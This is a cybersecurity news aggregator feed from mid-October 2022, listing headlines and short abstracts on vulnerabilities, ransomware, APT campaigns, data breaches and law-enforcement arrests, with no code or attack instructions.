Attackers could exploit a now-patched spoofing vulnerability in Service Fabric Explorer to gain admin privileges and hijack Azure Service Fabric clusters.BleepingComputer
October 19, 2022 – Vulnerabilities
WordPress Security Update 6.0.3 Patches 16 Vulnerabilities Full Text
Abstract
Researchers say they found that these vulnerabilities are unlikely to be exploited at scale, but several of them potentially give knowledgeable attackers a mechanism to compromise high-value sites via tailored attacks.Security Week
October 19, 2022 – Government
CISA Warns of Critical Flaws Affecting Industrial Appliances from Advantech and Hitachi Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday released two Industrial Control Systems (ICS) advisories pertaining to severe flaws in Advantech R-SeeNet and Hitachi Energy APM Edge appliances. This consists of three weaknesses in the R-SeeNet monitoring solution, successful exploitation of which "could result in an unauthorized attacker remotely deleting files on the system or allowing remote code execution." The list of issues, which affect R-SeeNet Versions 2.4.17 and prior, is as follows: CVE-2022-3385 and CVE-2022-3386 (CVSS scores: 9.8), two stack-based buffer overflow flaws that could lead to remote code execution; CVE-2022-3387 (CVSS score: 6.5), a path traversal flaw that could enable a remote attacker to delete arbitrary PDF files. Patches have been made available in R-SeeNet version 2.4.21, released on September 30, 2022. Also published by CISA is an update to a December 2021 advisory about multiple flaws in HitacThe Hacker News
October 19, 2022 – Vulnerabilities
Apache Commons Text RCE flaw — Keep calm and patch away Full Text
Abstract
A remote code execution flaw in the open-source Apache Commons Text library has some people worried that it could turn into the next Log4Shell. However, most cybersecurity researchers say it is nowhere near as concerning.BleepingComputer
October 19, 2022 – Hacker
Winnti Threat Group Targets Government Organizations In Hong Kong and Sri Lanka Full Text
Abstract
In its latest activities, Winnti focused on Hong Kong and Sri Lankan organizations. It deployed Spyder Loader (Trojan.Spyload) malware on victim networks in Hong Kong, mostly as a part of the CuckooBees campaign.Heimdal Security
October 19, 2022 – Vulnerabilities
Explained: Log4Shell-like bugs Found in Apache Commons Text Full Text
Abstract
The flaw exists in Apache Commons Text, a library released in 2017 that focuses on algorithms enabling a variety of functionalities around strings. The proof-of-concept (PoC) code for the flaw is available.Aquasec
October 19, 2022 – Breach
Hackers Threaten to Release Stolen Medical Data of High-Profile Australians Full Text
Abstract
The unknown hackers claim to have 200 gigabytes of data from Medibank, a private health insurer in Australia that has roughly 3.9 million customers in a country of just 25 million people.Gizmodo
October 19, 2022 – Hacker
Is it TeamTNT Or a Copycat Group? Full Text
Abstract
Recent observations by researchers say a threat group, maybe TeamTNT, has returned. The copycat group is imitating the routines of TeamTNT and has been deploying an XMRig cryptocurrency miner.Trend Micro
October 19, 2022 – Vulnerabilities
Microsoft Office 365 Message Encryption (OME) doesn’t ensure confidentiality Full Text
Abstract
A bug in the message encryption mechanism used by Microsoft in Office 365 can allow access to the contents of the messages. Researchers at the cybersecurity firm WithSecure discovered a bug in the message encryption mechanism used by Microsoft...Security Affairs
October 18, 2022 – Criminals
Ransom Cartel linked to notorious REvil ransomware operation Full Text
Abstract
Threat analysts have connected the pieces that link the Ransom Cartel RaaS (ransomware-as-a-service) to the REvil gang, one of the most notorious and prolific ransomware groups in recent years.BleepingComputer
October 18, 2022 – Breach
Keystone Health Data Breach Impacts 235,000 Patients Full Text
Abstract
In a data breach notification published on its website, Keystone is disclosing a cybersecurity incident identified on August 19 and which has resulted in the disruption of some systems.Security Week
October 18, 2022 – Cryptocurrency
Cryptocurrency and Ransomware — The Ultimate Friendship Full Text
Abstract
Both cryptocurrency and ransomware are nothing new in the digital world; both have been there for a very long time, which was enough for them to find common pieces for starting their relationship. Ransomware can be like a virtual car that works on all types of fuels, and crypto is the one that is currently most recommended. No one can argue that 2020 was the year of ransomware in the cyber world, but it wasn't due to the fact that cybercriminals chose ransomware just because they knew how to attack properly. It's because of the fact that crypto rose mostly this year, along with the new normal of the digital world. It gave them a new cause to stick to ransomware, thanks to the anonymous payments that can be made using a cryptocurrency. How does ransomware work? Ransomware is a malware type that encrypts the victim's files, whether it's a random user or an organization, leading to denying them access to those files on their personal devices. And the key to gainingThe Hacker News
October 18, 2022 – Criminals
Law enforcement arrested 31 suspects for stealing cars by hacking key fobs Full Text
Abstract
An international law enforcement operation led by Europol disrupted a cybercrime ring focused on hacking wireless key fobs to steal cars. The French authorities in cooperation with their Spanish and Latvian peers, and with the support of Europol and Eurojust,...Security Affairs
October 18, 2022 – Government
FBI: Scammers likely to target US Student Loan Debt Relief applicants Full Text
Abstract
The FBI has released a warning that scammers may be targeting individuals seeking to enroll in the Federal Student Aid program to steal their personal information, payment details, and money.BleepingComputer
October 18, 2022 – Malware
PHP Malware Distributed as Cracked Microsoft Office Apps, Telegram Full Text
Abstract
The Zscaler ThreatLabz research team observed a PHP version of ‘Ducktail’ Infostealer distributed in the form of cracked application installers for a variety of applications including games, Microsoft Office applications, Telegram, and others.GB Hackers
October 18, 2022 – Malware
Chinese ‘Spyder Loader’ Malware Spotted Targeting Organizations in Hong Kong Full Text
Abstract
The China-aligned espionage-focused actor dubbed Winnti has set its sights on government organizations in Hong Kong as part of an ongoing campaign dubbed Operation CuckooBees. Active since at least 2007, Winnti (aka APT41, Barium, Bronze Atlas, and Wicked Panda) is the name designated to a prolific cyber threat group that carries out Chinese state-sponsored espionage activity, predominantly aimed at stealing intellectual property from organizations in developed economies. The threat actor's campaigns have targeted healthcare, telecoms, high-tech, media, agriculture, and education sectors, with infection chains primarily relying on spear-phishing emails with attachments to initially break into the victims' networks. Earlier this May, Cybereason disclosed long-running attacks orchestrated by the group since 2019 to siphon technology secrets from technology and manufacturing companies mainly located in East Asia, Western Europe, and North America. The intrusions, clubbThe Hacker News
October 18, 2022 – APT
China-linked APT41 group targets Hong Kong with Spyder Loader Full Text
Abstract
China-linked threat actors APT41 (a.k.a. Winnti) targeted organizations in Hong Kong, in some cases remaining undetected for a year. Symantec researchers reported that cyberespionage group APT41 targeted organizations in Hong Kong in a campaign that...Security Affairs
October 18, 2022 – Hacker
Hackers target Asian casinos in lengthy cyberespionage campaign Full Text
Abstract
A hacking group named 'DiceyF' has been observed deploying a malicious attack framework against online casinos based in Southeast Asia since at least November 2021.BleepingComputer
October 18, 2022 – Breach
Vinomofo Suffers Major Data Breach Full Text
Abstract
Online wine seller Vinomofo has disclosed a major data breach in which an intruder accessed customers’ personal information including names, dates of birth, addresses, and contact details.Sydney Morning Herald
October 18, 2022 – Criminals
European Police Arrest a Gang That Hacked Wireless Key Fobs to Steal Cars Full Text
Abstract
Law enforcement authorities in France, in collaboration with Spain and Latvia, have disrupted a cybercrime ring that leveraged a hacking tool to steal cars without having to use a physical key fob. "The criminals targeted vehicles with keyless entry and start systems, exploiting the technology to get into the car and drive away," Europol said in a press statement. The coordinated operation, which took place on October 10, 2022, resulted in the arrest of 31 suspects from across 22 locations in the three nations, including software developers, its resellers, and the car thieves who used the tool to break into vehicles. Also confiscated by the officials as part of the arrests were criminal assets worth €1,098,500, not to mention an internet domain that allegedly advertised the service online. Per Europol, the criminals are said to have singled out keyless vehicles from two unnamed French car manufacturers. The perpetrators then used the fraudulent package to replace theThe Hacker News
October 18, 2022 – Vulnerabilities
Critical Remote Code Execution issue impacts popular post-exploitation toolkit Cobalt Strike Full Text
Abstract
HelpSystems, the company that developed the Cobalt Strike platform, addressed a critical remote code execution vulnerability in its software. HelpSystems, the company that developed the commercial post-exploitation toolkit Cobalt Strike, addressed...Security Affairs
October 18, 2022 – Breach
Verizon notifies prepaid customers their accounts were breached Full Text
Abstract
Verizon warned an undisclosed number of prepaid customers that attackers gained access to Verizon accounts and used exposed credit card info in SIM swapping attacks.BleepingComputer
October 18, 2022 – Breach
New Data Leaks Add to Australia’s Data Security Reckoning Full Text
Abstract
Personal data from MyDeal[.]com[.]au, a marketplace owned by Australia's largest grocery chain Woolworths Group, has appeared for sale on a data leak forum. The data breach appears to be legitimate as per Troy Hunt, a data breach expert.Bank Info Security
October 18, 2022 – Vulnerabilities
Critical RCE Vulnerability Discovered in Popular Cobalt Strike Hacking Software Full Text
Abstract
HelpSystems, the company behind the Cobalt Strike software platform, has released an out-of-band security update to address a remote code execution vulnerability that could allow an attacker to take control of targeted systems. Cobalt Strike is a commercial red-team framework that's mainly used for adversary simulation, but cracked versions of the software have been actively abused by ransomware operators and espionage-focused advanced persistent threat (APT) groups alike. The post-exploitation tool consists of a team server, which functions as a command-and-control (C2) component, and a beacon, the default malware used to create a connection to the team server and drop next-stage payloads. The issue, tracked as CVE-2022-42948, affects Cobalt Strike version 4.7.1, and stems from an incomplete patch released on September 20, 2022, to rectify a cross-site scripting (XSS) vulnerability (CVE-2022-39197) that could lead to remote code execution. "The XSS vulnerabiThe Hacker News
October 18, 2022 – Vulnerabilities
Over 17,000 Fortinet devices exposed online are very likely vulnerable to CVE-2022-40684 Full Text
Abstract
Fortinet confirmed that many systems are still vulnerable to attacks exploiting the CVE-2022-40684 zero-day vulnerability. Fortinet is urging customers to address the recently discovered CVE-2022-40684 zero-day vulnerability. Unfortunately, the number...Security Affairs
October 18, 2022 – Vulnerabilities
Text message verification flaws in your Windows Active Directory Full Text
Abstract
While text-messaging-based MFA goes a long way toward protecting an org against compromised credentials, it also has vulnerabilities of its own. Orgs must look for ways around the flaws associated with text-based MFA by upgrading to multi-factor authentication. Learn more in this article from Specops Software.BleepingComputer
October 18, 2022 – Vulnerabilities
Researchers Keep a Wary Eye on Critical New Vulnerability in Apache Commons Text Full Text
Abstract
Researchers are closely tracking a critical, newly disclosed vulnerability in Apache Commons Text that gives unauthenticated attackers a way to execute code remotely on servers running applications with the affected component.Dark Reading
October 18, 2022 – Vulnerabilities
CVE-2022-28762: Zoom for macOS contains a debugging port misconfiguration Full Text
Abstract
Video messaging company Zoom fixed a high-severity vulnerability, tracked as CVE-2022-28762, in Zoom Client for Meetings for macOS. Zoom Client for Meetings for macOS (Standard and for IT Admin) is affected by a debugging port misconfiguration. The issue,...Security Affairs
October 18, 2022 – Solution
DuckDuckGo for Mac enters public beta, now available to everyone Full Text
Abstract
Mac users can now try the privacy features in the DuckDuckGo browser as the app has entered the beta stage of development.BleepingComputer
October 18, 2022 – Breach
Hackers compromised Hong Kong govt agency network for a year Full Text
Abstract
Researchers at Symantec have uncovered cyberattacks attributed to the China-linked espionage actor APT41 (a.k.a. Winnti) that breached government agencies in Hong Kong and remained undetected for a year in some cases.BleepingComputer
October 17, 2022 – Malware
Malware dev claims to sell new BlackLotus Windows UEFI bootkit Full Text
Abstract
A threat actor is selling on hacking forums what they claim to be a new UEFI bootkit named BlackLotus, a malicious tool with capabilities usually linked to state-backed threat groups.BleepingComputer
October 17, 2022 – Phishing
Ducktail Tricks Victims to Steal Facebook Admin Credentials Full Text
Abstract
A newly-launched phishing campaign by Ducktail operators is spreading malware via fake lures for games, subtitle files, adult videos, and cracked MS Office applications. The info-stealer, written in PHP, focuses on stealing Facebook account data and any valuable information stored in users’ account ... Read MoreCyware Alerts - Hacker News
October 17, 2022 – Hacker
Black Basta Ransomware Hackers Infiltrate Networks via Qakbot to Deploy Brute Ratel C4 Full Text
Abstract
The threat actors behind the Black Basta ransomware family have been observed using the Qakbot trojan to deploy the Brute Ratel C4 framework as a second-stage payload in recent attacks. The development marks the first time the nascent adversary simulation software is being delivered via a Qakbot infection, cybersecurity firm Trend Micro said in a technical analysis released last week. The intrusion, achieved using a phishing email containing a weaponized link pointing to a ZIP archive, further entailed the use of Cobalt Strike for lateral movement. While these legitimate utilities are designed for conducting penetration testing activities, their ability to offer remote access has made them a lucrative tool in the hands of attackers looking to stealthily probe the compromised environment without attracting attention for extended periods of time. This has been compounded by the fact that a cracked version of Brute Ratel C4 began circulating last month across the cybercrimiThe Hacker News
October 17, 2022 – Breach
Retail giant Woolworths discloses data breach of MyDeal online marketplace Full Text
Abstract
Australian retail giant Woolworths disclosed a data breach that impacted approximately 2.2 million MyDeal customers. Bad news for the customers of the MyDeal online marketplace: the Australian retail giant Woolworths disclosed a data breach that impacted...Security Affairs
October 17, 2022 – Breach
MyDeal data breach impacts 2.2M users, stolen data for sale online Full Text
Abstract
Woolworths' MyDeal subsidiary has disclosed a data breach affecting 2.2 million customers, with the hacker trying to sell the stolen data on a hacker forum.BleepingComputer
October 17, 2022 – Ransomware
Magniber Ransomware Learns New Techniques, Targets Home Users Full Text
Abstract
A new Magniber campaign was found delivering fake Windows 10 and antivirus software updates to target home users while staying undetected. Post-encryption, the attackers demand a ransom of up to $2,500. In April 2022, Magniber was spotted spreading as a Windows 10 update through malicious websites. ... Read MoreCyware Alerts - Hacker News
October 17, 2022 – Vulnerabilities
Researchers Say Microsoft Office 365 Uses Broken Email Encryption to Secure Messages Full Text
Abstract
New research has disclosed what's being called a security vulnerability in Microsoft 365 that could be exploited to infer message contents due to the use of a broken cryptographic algorithm. "The [Office 365 Message Encryption] messages are encrypted in insecure Electronic Codebook ( ECB ) mode of operation," Finnish cybersecurity company WithSecure said in a report published last week. Office 365 Message Encryption (OME) is a security mechanism used to send and receive encrypted email messages between users inside and outside an organization without revealing anything about the communications themselves. A consequence of the newly disclosed issue is that rogue third-parties gaining access to the encrypted email messages may be able to decipher the messages, effectively breaking confidentiality protections. Electronic Codebook is one of the simplest modes of encryption wherein each message block is encoded separately by a key, meaning identical plaintext blocks wiThe Hacker News
October 17, 2022 – Malware
New UEFI rootkit Black Lotus offered for sale at $5,000 Full Text
Abstract
Black Lotus is a new, powerful Windows UEFI rootkit advertised on underground criminal forums, a researcher warns. Cybersecurity researcher Scott Scheferman reported that a new Windows UEFI rootkit, dubbed Black Lotus, is advertised on underground criminal...Security Affairs
October 17, 2022 – Vulnerabilities
Windows Mark of the Web bypass zero-day gets unofficial patch Full Text
Abstract
A free unofficial patch has been released through the 0patch platform to address an actively exploited zero-day flaw in the Windows Mark of the Web (MotW) security mechanism.BleepingComputer
October 17, 2022 – Ransomware
Ukraine, Poland Orgs Targeted by New Prestige Ransomware Full Text
Abstract
Microsoft Threat Intelligence Center discovered a new ransomware attack campaign directed at the transportation and logistics entities in Ukraine and Poland. For now, researchers have attributed the infections to an unnamed cluster - DEV-0960. They are also clueless about the method of initial acce ... Read MoreCyware Alerts - Hacker News
October 17, 2022 – Cryptocurrency
Why Crypto Winter is No Excuse to Let Your Cyber Defenses Falter Full Text
Abstract
Don't let the ongoing "crypto winter" lull you into a false sense of cybersecurity. Even as cryptocurrencies lose value — and some crypto companies file for bankruptcy — cryptojacking still poses an urgent threat to enterprises across industries, from financial services to healthcare to industry 4.0 and beyond. Broadly speaking, cryptojacking is defined as the unauthorized and illegitimate use of an unwitting party's compute and/or server power by a malicious actor to mine cryptocurrencies. While everyone with an internet connection is technically vulnerable to cryptojacking, most attacks target enterprises with significant compute resources, especially those with an outsized number of third-party relationships. (More on that last part in a bit.) And if a malicious actor can breach your cybersecurity defenses for cryptojacking purposes, they can breach them for any number of nefarious reasons. Under normal conditions, mining for cryptocurrency is hugely expensive because dThe Hacker News
October 17, 2022 – Attack
Japanese tech firm Oomiya hit by LockBit 3.0. Multiple supply chains potentially impacted Full Text
Abstract
The IT infrastructure of the Japanese tech company Oomiya was infected with the LockBit 3.0 ransomware. One of the affiliates for the LockBit 3.0 RaaS hit the Japanese tech company Oomiya. Oomiya is focused on designing and manufacturing microelectronics and...Security Affairs
October 17, 2022 – Attack
Australian insurance firm Medibank confirms ransomware attack Full Text
Abstract
Health insurance provider Medibank has confirmed that a ransomware attack is responsible for last week's cyberattack and disruption of online services.BleepingComputer
October 17, 2022 – Malware
Copybara Malware Uses Vishing Tricks to Target Italian Banking Users Full Text
Abstract
Researchers at ThreatFabric uncovered an Android banking malware attack phishing users for their contact details and sensitive banking data. The malware, dubbed Copybara, can extract usernames and passwords for multiple banking accounts. The attack begins with an SMS phishing message purported to a ... Read MoreCyware Alerts - Hacker News
October 17, 2022 – Ransomware
New Prestige Ransomware Targeting Polish and Ukrainian Organizations Full Text
Abstract
A new ransomware campaign targeted the transportation and logistics sectors in Ukraine and Poland on October 11 with a previously unknown payload dubbed Prestige. "The activity shares victimology with recent Russian state-aligned activity, specifically on affected geographies and countries, and overlaps with previous victims of the FoxBlade malware (also known as HermeticWiper)," the Microsoft Threat Intelligence Center (MSTIC) said. The tech giant remarked the intrusions occurred within an hour of each other across all victims, attributing the infections to an unnamed cluster called DEV-0960. It did not disclose the scale of the attacks, but stated it's notifying all affected customers. The campaign is also believed to be distinct from other recent destructive attacks that have involved the use of HermeticWiper and CaddyWiper, the latter of which is launched by a malware loader called ArguePatch (aka AprilAxe). The method of initial access remains unknoThe Hacker News
October 17, 2022 – Attack
Bulgaria hit by a cyber attack originating from Russia Full Text
Abstract
Government institutions in Bulgaria were hit by a cyber attack during the weekend; experts believe it was launched by Russian threat actors. The infrastructure of government institutions in Bulgaria has been hit by a massive DDoS attack. The attack...Security Affairs
October 17, 2022 – Criminals
Police dismantle criminal ring that hacked keyless cars Full Text
Abstract
Authorities from France, Latvia, and Spain arrested 31 suspects believed to be part of a car theft ring that targeted vehicles from two French car manufacturers.BleepingComputer
October 17, 2022 – General
National Cybersecurity Awareness Month: Don’t Fear the Cyber Goonies Full Text
Abstract
User education has always been seen as a critical part of any cybersecurity plan. That’s because most cyber attacks still start with phishing, usually as an email trying to lure the user into giving up their password or other critical information.Cisco
October 17, 2022 – Vulnerabilities
Zimbra Releases Patch for Actively Exploited Vulnerability in its Collaboration Suite Full Text
Abstract
Zimbra has released patches to contain an actively exploited security flaw in its enterprise collaboration suite that could be leveraged to upload arbitrary files to vulnerable instances. Tracked as CVE-2022-41352 (CVSS score: 9.8), the issue affects a component of the Zimbra suite called Amavis, an open source content filter, and more specifically, the cpio utility it uses to scan and extract archives. The flaw, in turn, is said to be rooted in another underlying vulnerability (CVE-2015-1197) that was first disclosed in early 2015, which according to Flashpoint was rectified, only to be subsequently reverted in later Linux distributions. "An attacker can use cpio package to gain incorrect access to any other user accounts," Zimbra said in an advisory published last week, adding it "recommends pax over cpio." Fixes are available in the following versions: Zimbra 9.0.0 Patch 27, Zimbra 8.8.15 Patch 34. All an adversary seeking needs to do to weapoThe Hacker News
October 17, 2022 – Criminals
Interpol arrested 75 members of the cybercrime ring Black Axe Full Text
Abstract
Interpol has announced the arrests of 75 individuals as part of a coordinated international operation against an organized cybercrime ring called Black Axe. Interpol arrested 75 individuals as part of a coordinated global operation, codenamed Operation...Security Affairs
October 17, 2022 – Outage
Ransomware attack halts circulation of some German newspapers Full Text
Abstract
German newspaper 'Heilbronn Stimme' published today's 28-page issue in e-paper form after a Friday ransomware attack crippled its printing systems.BleepingComputer
October 17, 2022 – Attack
Ransomware Actors Target a Major Indian Pharma Company Full Text
Abstract
Leaked data from Aarti Drugs includes business and administration data, including loan documents and tax filing information, whereas stolen data from Ipca Laboratories includes employee records, formulation data, and financial and audit reports.The Times Of India
October 17, 2022 – Criminals
INTERPOL-led Operation Takes Down ‘Black Axe’ Cyber Crime Organization Full Text
Abstract
The International Criminal Police Organization, also called the Interpol, has announced the arrests of 75 individuals as part of a coordinated global operation against an organized cyber crime syndicate called Black Axe. "'Black Axe' and other West African organized crime groups have developed transnational networks, defrauding victims of millions while channeling their profits into lavish lifestyles and other criminal activities, from drug trafficking to sexual exploitation," the agency said. The law enforcement effort, codenamed Operation Jackal, involved the participation of Argentina, Australia, Côte d'Ivoire, France, Germany, Ireland, Italy, Malaysia, Nigeria, Spain, South Africa, the U.A.E, the U.K., and the U.S. Two of the alleged online scammers, who were arrested late last month in South Africa, are believed to have orchestrated a variety of fraudulent schemes that netted them $1.8 million from victims. The probe further led to 49 property searcThe Hacker News
October 17, 2022 – Vulnerabilities
45,654 VMware ESXi servers reached End of Life on Oct. 15 Full Text
Abstract
Lansweeper warns that over 45,000 VMware ESXi servers exposed online have reached end-of-life (EOL), making them an easy target for attackers. IT Asset Management software provider Lansweeper has scanned the Internet for VMware ESXi servers and found...Security Affairs
October 17, 2022 – Attack
Japanese Tech firm Oomiya Hit by LockBit 3.0; Supply Chains Impacted Full Text
Abstract
LockBit 3.0 operators claim to have stolen data from the company and threaten to leak it by October 20, 2022 if the company does not pay the ransom. At this time, the ransomware gang has yet to publish samples of the allegedly stolen documents.Security Affairs
October 17, 2022 – Malware
New ‘Black Lotus’ UEFI Rootkit Provides APT-Level Capabilities to Cybercriminals Full Text
Abstract
Black Lotus provides a full set of capabilities to attackers, including file transfer and tasking support, and can potentially become a major threat across IT and OT environments.Security Week
October 16, 2022 – Ransomware
Venus Ransomware targets publicly exposed Remote Desktop services Full Text
Abstract
Threat actors behind the relatively new Venus Ransomware are hacking into publicly-exposed Remote Desktop services to encrypt Windows devices.BleepingComputer
October 16, 2022 – Ransomware
Mysterious Prestige ransomware targets organizations in Ukraine and Poland Full Text
Abstract
Microsoft warns that new Prestige ransomware is targeting transportation and logistics organizations in Ukraine and Poland. Microsoft reported that new Prestige ransomware is being used in attacks aimed at transportation and logistics organizations...Security Affairs
October 16, 2022 – Malware
New PHP information-stealing malware targets Facebook accounts Full Text
Abstract
Threat analysts have spotted a new Ducktail campaign using a new infostealer variant and novel TTPs (tactics, techniques, and procedures), while the Facebook users it targets are no longer limited to holders of business accounts.BleepingComputer
October 16, 2022 – Attack
Threat actors hacked hundreds of servers by exploiting Zimbra CVE-2022-41352 bug Full Text
Abstract
Threat actors have compromised hundreds of servers exploiting critical flaw CVE-2022-41352 in Zimbra Collaboration Suite (ZCS). Last week, researchers from Rapid7 warned of the exploitation of unpatched zero-day remote code execution vulnerability,...Security Affairs
October 16, 2022 – General
Security Affairs newsletter Round 389 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter has arrived! Every week, the best security articles from Security Affairs, free in your inbox. If you also want to receive the free newsletter covering the international press, subscribe here. New...Security Affairs
October 15, 2022 – Attack
Indian Energy Company Tata Power’s IT Infrastructure Hit By Cyber Attack Full Text
Abstract
Tata Power Company Limited, India's largest integrated power company, on Friday confirmed it was targeted by a cyberattack. The intrusion on IT infrastructure impacted "some of its IT systems," the company said in a filing with the National Stock Exchange (NSE) of India. It further said it has taken steps to retrieve and restore the affected machines, adding it put in place security guardrails for customer-facing portals to prevent unauthorized access. The Mumbai-based electric utility company, part of the Tata Group conglomerate, did not disclose any further details about the nature of the attack, or when it took place. That said, cybersecurity firm Recorded Future in April disclosed attacks mounted by China-linked adversaries targeting Indian power grid organizations. The network intrusions are said to have been aimed at "at least seven Indian State Load Despatch Centres (SLDCs) responsible for carrying out real-time operations for grid control and electThe Hacker News
October 15, 2022 – Vulnerabilities
Over 45,000 VMware ESXi servers just reached end-of-life Full Text
Abstract
Over 45,000 VMware ESXi servers inventoried by Lansweeper just reached end-of-life (EOL), with VMware no longer providing software and security updates unless companies purchase an extended support contract.BleepingComputer
October 15, 2022 – Vulnerabilities
Fortinet urges admins to patch bug with public exploit immediately Full Text
Abstract
Fortinet urges customers to urgently patch their appliances against a critical authentication bypass vulnerability in FortiOS, FortiProxy, and FortiSwitchManager that is being exploited in attacks.BleepingComputer
October 15, 2022 – Malware
New PHP Version of Ducktail info-stealer hijacks Facebook Business accounts Full Text
Abstract
Experts spotted a PHP version of an information-stealing malware called Ducktail spread as cracked installers for legitimate apps and games. Zscaler researchers discovered a PHP version of an information-stealing malware tracked as Ducktail. The malicious...Security Affairs
October 15, 2022 – Attack
Almost 900 servers hacked using Zimbra zero-day flaw Full Text
Abstract
Almost 900 servers have been hacked using a critical Zimbra Collaboration Suite (ZCS) vulnerability, which at the time was a zero-day without a patch for nearly 1.5 months.BleepingComputer
October 15, 2022 – Vulnerabilities
Palo Alto Networks fixed a high-severity auth bypass flaw in PAN-OS Full Text
Abstract
Palo Alto Networks addressed a high-severity authentication bypass vulnerability affecting the PAN-OS 8.1 software. Palo Alto Networks released security patches to address a high-severity authentication bypass flaw, tracked as CVE-2022-0030 (CVSS...Security Affairs
October 15, 2022 – Attack
Indian power generation giant Tata Power hit by a cyber attack Full Text
Abstract
Tata Power Company Limited, India's largest power generation company, announced it was hit by a cyberattack. Tata Power on Friday announced that it was hit by a cyber attack. Threat actors hit the Information Technology (IT) infrastructure of the company. The...Security Affairs
October 15, 2022 – Attack
Tata Power, a top power producer in India, confirms cyberattack Full Text
Abstract
Tata Power, a leading power generation company in India, has confirmed it was hit by a cyberattack. In a brief statement, the Mumbai-based company said that the attack impacted some of its IT systems.Tech Crunch
October 14, 2022 – Ransomware
The Week in Ransomware - October 14th 2022 - Bitcoin Trickery Full Text
Abstract
This week's news is action-packed, with police tricking ransomware operators into releasing keys, and victims calling ransomware operations liars.BleepingComputer
October 14, 2022 – Vulnerabilities
Researchers Detail Windows Zero-Day Vulnerability Patched Last Month Full Text
Abstract
Details have emerged about a now-patched security flaw in Windows Common Log File System (CLFS) that could be exploited by an attacker to gain elevated permissions on compromised machines. Tracked as CVE-2022-37969 (CVSS score: 7.8), the issue was addressed by Microsoft as part of its Patch Tuesday updates for September 2022, while also noting that it was being actively exploited in the wild. "An attacker must already have access and the ability to run code on the target system," the company noted in its advisory. "This technique does not allow for remote code execution in cases where the attacker does not already have that ability on the target system." It also credited researchers from CrowdStrike, DBAPPSecurity, Mandiant, and Zscaler for reporting the vulnerability without delving into additional specifics surrounding the nature of the attacks. Now, the Zscaler ThreatLabz research team has disclosed that it captured an in-the-wild exploit for the theThe Hacker News
October 14, 2022 – Vulnerabilities
Experts disclose technical details of now-patched CVE-2022-37969 Windows Zero-Day Full Text
Abstract
Researchers disclosed details of a now-patched flaw, tracked as CVE-2022-37969, in Windows Common Log File System (CLFS). The CVE-2022-37969 (CVSS score: 7.8) flaw is a Windows Common Log File System Driver Elevation of Privilege Vulnerability. The Common...Security Affairs
October 14, 2022 – Criminals
Police trick DeadBolt ransomware out of 155 decryption keys Full Text
Abstract
The Dutch National Police, in collaboration with cybersecurity firm Responders.NU, tricked the DeadBolt ransomware gang into handing over 155 decryption keys by faking ransom payments.BleepingComputer
October 14, 2022 – Malware
New Alchimist C2 Framework Targets Windows, Linux, macOS Full Text
Abstract
A new attack and C2 framework, dubbed Alchimist, was found capable of targeting Linux, macOS, and Windows systems. It can run arbitrary commands and perform remote shellcode execution. These kinds of frameworks have high quality, rich features, good detection evasion capabilities, and effective imp ... Read MoreCyware Alerts - Hacker News
October 14, 2022 – Hacker
New Chinese Cyberespionage Group Targeting IT Service Providers and Telcos Full Text
Abstract
Telecommunications and IT service providers in the Middle East and Asia are being targeted by a previously undocumented Chinese-speaking threat group dubbed WIP19. The espionage-related attacks are characterized by the use of a stolen digital certificate issued by a Korean company called DEEPSoft to sign malicious artifacts deployed during the infection chain to evade detection. "Almost all operations performed by the threat actor were completed in a 'hands-on keyboard' fashion, during an interactive session with compromised machines," SentinelOne researchers Joey Chen and Amitai Ben Shushan Ehrlich said in a report this week. "This meant the attacker gave up on a stable [command-and-control] channel in exchange for stealth." WIP, short for work-in-progress, is the moniker assigned by SentinelOne to emerging or hitherto unattributed activity clusters, similar to the UNC####, DEV-####, and TAG-## designations given by Mandiant, Microsoft, and RecoThe Hacker News
October 14, 2022 – APT
WIP19, a new Chinese APT targets IT Service Providers and Telcos Full Text
Abstract
A Chinese-speaking threat actor, tracked as WIP19, is targeting telecommunications and IT service providers in the Middle East and Asia. SentinelOne researchers uncovered a new threat cluster, tracked as WIP19, which has been targeting telecommunications...Security Affairs
October 14, 2022 – Ransomware
Microsoft: New Prestige ransomware targets orgs in Ukraine, Poland Full Text
Abstract
Microsoft says new Prestige ransomware is being used to target transportation and logistics organizations in Ukraine and Poland in ongoing attacks.BleepingComputer
October 14, 2022 – Malware
YoWhatsApp - An Unofficial WhatsApp App Steals Credentials Full Text
Abstract
A malicious version of the popular WhatsApp messaging app was found dropping an Android trojan known as Triada. Named YoWhatsApp, the unofficial app offers the ability to lock chats, send texts to unsaved numbers, and customize using different themes. It is spread to users via fraudulent ads on Sna ... Read MoreCyware Alerts - Hacker News
October 14, 2022 – Malware
New PHP Version of Ducktail Malware Hijacking Facebook Business Accounts Full Text
Abstract
A PHP version of an information-stealing malware called Ducktail has been discovered in the wild being distributed in the form of cracked installers for legitimate apps and games, according to the latest findings from Zscaler. "Like older versions (.NetCore), the latest version (PHP) also aims to exfiltrate sensitive information related to saved browser credentials, Facebook account information, etc.," Zscaler ThreatLabz researchers Tarun Dewan and Stuti Chaturvedi said. Ducktail, which emerged on the threat landscape in late 2021, is attributed to an unnamed Vietnamese threat actor, with the malware primarily designed to hijack Facebook business and advertising accounts. The financially motivated cybercriminal operation was first documented by Finnish cybersecurity company WithSecure (formerly F-Secure) in late July 2022. While previous versions of the malware were found to use Telegram as a command-and-control (C2) channel to exfiltrate information, the PHP varThe Hacker News
October 14, 2022 – Vulnerabilities
Experts released PoC exploit code for critical bug CVE-2022-40684 in Fortinet products Full Text
Abstract
Experts released the PoC exploit code for the authentication bypass flaw CVE-2022-40684 in FortiGate firewalls and FortiProxy web proxies. A proof-of-concept (PoC) exploit code for the authentication bypass vulnerability CVE-2022-40684 (CVSS score:...Security Affairs
October 14, 2022 – Policy and Law
Student jailed for hacking female classmates’ email, Snapchat accounts Full Text
Abstract
On Thursday, a Puerto Rico judge sentenced a former University of Puerto Rico (UPR) student to 13 months in prison for hacking over a dozen email and Snapchat accounts of female colleagues. (BleepingComputer)
October 14, 2022 – Ransomware
Ransom Cartel Ransomware: A Possible Connection With REvil Full Text
Abstract
Ransom Cartel is ransomware as a service (RaaS) that surfaced in mid-December 2021. This ransomware performs double extortion attacks and exhibits several similarities and technical overlaps with REvil ransomware. (Palo Alto Networks)
October 14, 2022 – General
How To Build a Career as a Freelance Cybersecurity Analyst — From Scratch Full Text
Abstract
